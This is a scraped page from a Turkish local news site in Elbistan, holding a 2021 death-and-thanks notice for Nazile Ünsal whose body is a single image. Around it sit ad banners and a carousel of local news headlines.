<a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/Yaşam-Hastanesi-980.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/oztunc-ve-torundan-b-termik-santrali-devrediliyor-iddiasi-h70343.html" title="Öztunç ve Torun’dan B Termik Santrali devrediliyor iddiası" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/06/İsimsiz-1.jpg" alt="Öztunç ve Torun’dan B Termik Santrali devrediliyor iddiası" />
      <div class="caption">Öztunç ve Torun’dan B Termik...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kirmizi-ette-yeniden-marka-olmasinin-adimlari-atiliyor-h70338.html" title="Elbistan’ın kırmızı ette yeniden marka olmasının adımları atılıyor" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/06/kırmızı-ette-marka-1.jpg" alt="Elbistan’ın kırmızı ette yeniden marka olmasının adımları atılıyor" />
      <div class="caption">Elbistan’ın kırmızı ette yeniden marka...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/gazi-mehmetcike-gecmis-olsun-ziyareti-h70333.html" title="Gazi Mehmetçik’e geçmiş olsun ziyareti" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/06/şehitler-derneği-ziyaret.jpg" alt="Gazi Mehmetçik’e geçmiş olsun ziyareti" />
      <div class="caption">Gazi Mehmetçik’e geçmiş olsun ziyareti</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/elbistansporun-9-futbolcusu-viransehirde-gida-zehirlenmesi-gecirdi-h70329.html" title="Elbistanspor’un 9 futbolcusu Viranşehir’de gıda zehirlenmesi geçirdi" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/06/elbistanspor-zehirlenme-1.jpg" alt="Elbistanspor’un 9 futbolcusu Viranşehir’de gıda zehirlenmesi geçirdi" />
      <div class="caption">Elbistanspor’un 9 futbolcusu Viranşehir’de gıda...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/saglik-hizmetleri-myo-2-bolumde-daha-ogrenci-alacak-h70326.html" title="Sağlık Hizmetleri MYO, 2 bölümde daha öğrenci alacak" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/06/emyo.jpg" alt="Sağlık Hizmetleri MYO, 2 bölümde daha öğrenci alacak" />
      <div class="caption">Sağlık Hizmetleri MYO, 2 bölümde...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/kentpark-haziran.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/balYk_dunyasY.jpg&w=600&h=200&q=80" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Vefat - Teşekkür / Nazile ÜNSAL</h1>
                <h2 class="lead" itemprop="description"><strong></strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-06-15 13:44:37" content="2021-06-15T13:44:37+02:00">15 Haziran 2021 Salı 13:44</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/vefat_tesekkur_nazife_unsal_h70331_76444.jpg" alt="Vefat - Teşekkür / Nazile ÜNSAL" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-70331"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><img alt="" src="http://www.elbistaninsesi.com/images/upload/nazile-unsal-vefat-te&#x15F;ekkur.jpg" style="width: 640px; height: 1014px;"></img></p><div class="p_ad"></div></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-pomem-kursunda-yuzde-90-basari-h70348.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/misir-ureticilerine-yaprak-piresi-uyarisi-h70347.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kurak-avinda-yakalandilar-2-h70346.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/zmo-bugdayin-maliyetini-acikladi-h70345.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/15-temmuz-etkinlikleri-icin-toplanti-duzenlendi-h70344.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunc-ve-torundan-b-termik-santrali-devrediliyor-iddiasi-h70343.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/chpli-vekillerden-elbistan-cikarmasi-h70339.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-kirmizi-ette-yeniden-marka-olmasinin-adimlari-atiliyor-h70338.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/dunyanin-en-sacma-binasi-icin-geri-sayim-basladi-h70337.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-demirspor-yaz-futbol-okulu-aciliyor-h70336.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/akedastan-usulsuz-elektrik-kullanim-aciklamasi-h70335.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ogrencilerin-ingilizce-oykulerinden-olusan-kitaba-buyuk-ilgi-h70334.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/gazi-mehmetcike-gecmis-olsun-ziyareti-h70333.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/guvenlik-korucularina-hayirli-olsun-ziyareti-h70332.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistansporun-9-futbolcusu-viransehirde-gida-zehirlenmesi-gecirdi-h70329.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/saglik-hizmetleri-myo-2-bolumde-daha-ogrenci-alacak-h70326.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-muhtarlarla-bulustu-h70325.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-mutlu-kadin-huzurlu-aile-guclu-toplum-konferansi-h70324.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/jandarmadan-kaymakam-demire-182yil-ziyareti-h70323.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/evde-beslenen-kopeklerle-coban-ve-av-kopekleri-asilandi-h70322.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/cks-kaydi-icin-son-gun-30-haziran-2-h70321.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmarasin-proje-standina-buyuk-ilgi-h70320.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozu-ilk-adim-anaokulunda-3-ayri-e-twinning-projesi-h70319.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanspor-viransehirden-eli-bos-dondu-h70313.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-tamirhanenin-duvarina-carpti-3u-cocuk-4-yarali-h70312.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-pomem-kursunda-yuzde-90-basari-h70348.html" title="Elbistan Belediyesi POMEM kursunda yüzde 90 başarı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/elbistan_belediyesi_pomem_kursunda_yuzde_90_basari_h70348_f9e30.jpg" alt="Elbistan Belediyesi POMEM kursunda yüzde 90 başarı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan Belediyesi POMEM kursunda yüzde 90 başarı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/misir-ureticilerine-yaprak-piresi-uyarisi-h70347.html" title="Mısır üreticilerine yaprak piresi uyarısı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/misir_ureticilerine_yaprak_piresi_uyarisi_h70347_ceaf6.jpg" alt="Mısır üreticilerine yaprak piresi uyarısı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Mısır üreticilerine yaprak piresi uyarısı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kurak-avinda-yakalandilar-2-h70346.html" title="Kurak avında yakalandılar">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/kurak_avinda_yakalandilar_h70346_613ff.jpg" alt="Kurak avında yakalandılar" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kurak avında yakalandılar</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/zmo-bugdayin-maliyetini-acikladi-h70345.html" title="ZMO, buğdayın maliyetini açıkladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/zmo_bugdayin_maliyetini_acikladi_h70345_31b61.jpg" alt="ZMO, buğdayın maliyetini açıkladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">ZMO, buğdayın maliyetini açıkladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/15-temmuz-etkinlikleri-icin-toplanti-duzenlendi-h70344.html" title="15 Temmuz etkinlikleri için toplantı düzenlendi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/15_temmuz_etkinlikleri_icin_toplanti_duzenlendi_h70344_22412.jpg" alt="15 Temmuz etkinlikleri için toplantı düzenlendi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">15 Temmuz etkinlikleri için toplantı düzenlendi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/oztunc-ve-torundan-b-termik-santrali-devrediliyor-iddiasi-h70343.html" title="Öztunç ve Torun’dan B Termik Santrali devrediliyor iddiası">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/oztunc_ve_torundan_b_termik_santrali_devrediliyor_iddiasi_h70343_f7bfd.jpg" alt="Öztunç ve Torun’dan B Termik Santrali devrediliyor iddiası" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öztunç ve Torun’dan B Termik Santrali devrediliyor iddiası</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/chpli-vekillerden-elbistan-cikarmasi-h70339.html" title="CHP’li vekillerden Elbistan çıkarması">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/chpli_vekillerden_elbistan_cikarmasi_h70339_a4874.jpg" alt="CHP’li vekillerden Elbistan çıkarması" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">CHP’li vekillerden Elbistan çıkarması</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kirmizi-ette-yeniden-marka-olmasinin-adimlari-atiliyor-h70338.html" title="Elbistan’ın kırmızı ette yeniden marka olmasının adımları atılıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/elbistanin_kirmizi_ette_yeniden_marka_olmasinin_adimlari_atiliyor_h70338_31dd9.JPG" alt="Elbistan’ın kırmızı ette yeniden marka olmasının adımları atılıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’ın kırmızı ette yeniden marka olmasının adımları atılıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/dunyanin-en-sacma-binasi-icin-geri-sayim-basladi-h70337.html" title="‘Dünyanın en saçma binası’ için geri sayım başladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/dunyanin_en_sacma_binasi_icin_geri_sayim_basladi_h70337_10c81.jpg" alt="‘Dünyanın en saçma binası’ için geri sayım başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">‘Dünyanın en saçma binası’ için geri sayım başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistan-demirspor-yaz-futbol-okulu-aciliyor-h70336.html" title="Elbistan Demirspor yaz futbol okulu açılıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/elbistan_demirspor_yaz_futbol_okulu_aciliyor_h70336_b8a15.jpg" alt="Elbistan Demirspor yaz futbol okulu açılıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan Demirspor yaz futbol okulu açılıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/akedastan-usulsuz-elektrik-kullanim-aciklamasi-h70335.html" title="Akedaş’tan usulsüz elektrik kullanım açıklaması">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/akedastan_usulsuz_elektrik_kullanim_aciklamasi_h70335_145cf.jpg" alt="Akedaş’tan usulsüz elektrik kullanım açıklaması" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Akedaş’tan usulsüz elektrik kullanım açıklaması</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ogrencilerin-ingilizce-oykulerinden-olusan-kitaba-buyuk-ilgi-h70334.html" title="Öğrencilerin İngilizce öykülerinden oluşan kitaba büyük ilgi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/ogrencilerin_ingilizce_oykulerinden_olusan_kitaba_buyuk_ilgi_h70334_81070.jpg" alt="Öğrencilerin İngilizce öykülerinden oluşan kitaba büyük ilgi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öğrencilerin İngilizce öykülerinden oluşan kitaba büyük ilgi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/gazi-mehmetcike-gecmis-olsun-ziyareti-h70333.html" title="Gazi Mehmetçik’e geçmiş olsun ziyareti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/gazi_mehmetcike_gecmis_olsun_ziyareti_h70333_c8ab6.jpg" alt="Gazi Mehmetçik’e geçmiş olsun ziyareti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Gazi Mehmetçik’e geçmiş olsun ziyareti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/guvenlik-korucularina-hayirli-olsun-ziyareti-h70332.html" title="Güvenlik korucularına hayırlı olsun ziyareti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/guvenlik_korucularina_hayirli_olsun_ziyareti_h70332_c6b6f.jpg" alt="Güvenlik korucularına hayırlı olsun ziyareti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Güvenlik korucularına hayırlı olsun ziyareti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistansporun-9-futbolcusu-viransehirde-gida-zehirlenmesi-gecirdi-h70329.html" title="Elbistanspor’un 9 futbolcusu Viranşehir’de gıda zehirlenmesi geçirdi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/elbistansporun_9_futbolcusu_viransehirde_gida_zehirlenmesi_gecirdi_h70329_4f24e.jpg" alt="Elbistanspor’un 9 futbolcusu Viranşehir’de gıda zehirlenmesi geçirdi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistanspor’un 9 futbolcusu Viranşehir’de gıda zehirlenmesi geçirdi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/saglik-hizmetleri-myo-2-bolumde-daha-ogrenci-alacak-h70326.html" title="Sağlık Hizmetleri MYO, 2 bölümde daha öğrenci alacak">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/saglik_hizmetleri_myo_2_bolumde_daha_ogrenci_alacak_h70326_8c493.jpg" alt="Sağlık Hizmetleri MYO, 2 bölümde daha öğrenci alacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Sağlık Hizmetleri MYO, 2 bölümde daha öğrenci alacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-muhtarlarla-bulustu-h70325.html" title="Başkan Gürbüz, muhtarlarla buluştu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/baskan_gurbuz_muhtarlarla_bulustu_h70325_009c0.JPG" alt="Başkan Gürbüz, muhtarlarla buluştu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Gürbüz, muhtarlarla buluştu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistanda-mutlu-kadin-huzurlu-aile-guclu-toplum-konferansi-h70324.html" title="Elbistan’da ‘Mutlu kadın huzurlu aile güçlü toplum’ konferansı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/elbistanda_mutlu_kadin_huzurlu_aile_guclu_toplum_konferansi_h70324_8bec6.jpg" alt="Elbistan’da ‘Mutlu kadın huzurlu aile güçlü toplum’ konferansı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’da ‘Mutlu kadın huzurlu aile güçlü toplum’ konferansı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/jandarmadan-kaymakam-demire-182yil-ziyareti-h70323.html" title="Jandarmadan Kaymakam Demir’e 182.yıl ziyareti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/jandarmadan_kaymakam_demire_182yil_ziyareti_h70323_850dc.jpg" alt="Jandarmadan Kaymakam Demir’e 182.yıl ziyareti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Jandarmadan Kaymakam Demir’e 182.yıl ziyareti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/evde-beslenen-kopeklerle-coban-ve-av-kopekleri-asilandi-h70322.html" title="Evde beslenen köpeklerle çoban ve av köpekleri aşılandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/evde_beslenen_kopeklerle_coban_ve_av_kopekleri_asilandi_h70322_d6406.jpg" alt="Evde beslenen köpeklerle çoban ve av köpekleri aşılandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Evde beslenen köpeklerle çoban ve av köpekleri aşılandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/cks-kaydi-icin-son-gun-30-haziran-2-h70321.html" title="ÇKS kaydı için son gün 30 Haziran">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/cks_kaydi_icin_son_gun_30_haziran_h70321_cea41.jpg" alt="ÇKS kaydı için son gün 30 Haziran" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">ÇKS kaydı için son gün 30 Haziran</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasin-proje-standina-buyuk-ilgi-h70320.html" title="Kahramanmaraş’ın proje standına büyük ilgi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/kahramanmarasin_proje_standina_buyuk_ilgi_h70320_8b87b.jpg" alt="Kahramanmaraş’ın proje standına büyük ilgi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kahramanmaraş’ın proje standına büyük ilgi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ekinozu-ilk-adim-anaokulunda-3-ayri-e-twinning-projesi-h70319.html" title="Ekinözü İlk Adım Anaokulu’nda 3 ayrı e-Twinning projesi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/ekinozu_ilk_adim_anaokulunda_3_ayri_e_twinning_projesi_h70319_bf046.jpg" alt="Ekinözü İlk Adım Anaokulu’nda 3 ayrı e-Twinning projesi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ekinözü İlk Adım Anaokulu’nda 3 ayrı e-Twinning projesi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-viransehirden-eli-bos-dondu-h70313.html" title="Elbistanspor, Viranşehir’den eli boş döndü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/elbistanspor_viransehirden_eli_bos_dondu_h70313_5e59b.jpg" alt="Elbistanspor, Viranşehir’den eli boş döndü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistanspor, Viranşehir’den eli boş döndü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/otomobil-tamirhanenin-duvarina-carpti-3u-cocuk-4-yarali-h70312.html" title="Otomobil tamirhanenin duvarına çarptı: 3’ü çocuk 4 yaralı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/06/otomobil_tamirhanenin_duvarina_carpti_3u_cocuk_4_yarali_h70312_2b8ae.jpg" alt="Otomobil tamirhanenin duvarına çarptı: 3’ü çocuk 4 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Otomobil tamirhanenin duvarına çarptı: 3’ü çocuk 4 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Vefat++Te%C5%9Fekk%C3%BCr++Nazife+%C3%9CNSAL" title="Vefat  Teşekkür  Nazife ÜNSAL haberleri">Vefat  Teşekkür  Nazife ÜNSAL</a></div>
      <section>
              <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">3</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum hs-sdch" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
